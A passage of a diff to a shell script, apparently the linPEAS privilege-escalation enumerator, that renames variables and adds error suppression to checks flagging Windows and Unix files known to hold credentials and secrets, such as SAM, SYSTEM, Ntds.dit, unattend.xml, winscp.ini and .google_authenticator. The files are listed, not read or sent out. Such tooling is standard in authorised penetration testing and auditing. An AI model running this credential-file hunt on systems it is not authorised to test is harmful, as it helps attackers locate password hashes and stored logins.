]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Windows Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "\.rdg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SAM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "default\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "index\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "security\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "server\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "system\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; fi -if [ "$PSTORAGE_OTHER_INTERESTING_FILES" ] || [ "$DEBUG" ]; then - print_2title "Analyzing Other Interesting Files Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_OTHER_INTERESTING" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Other Interesting Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E 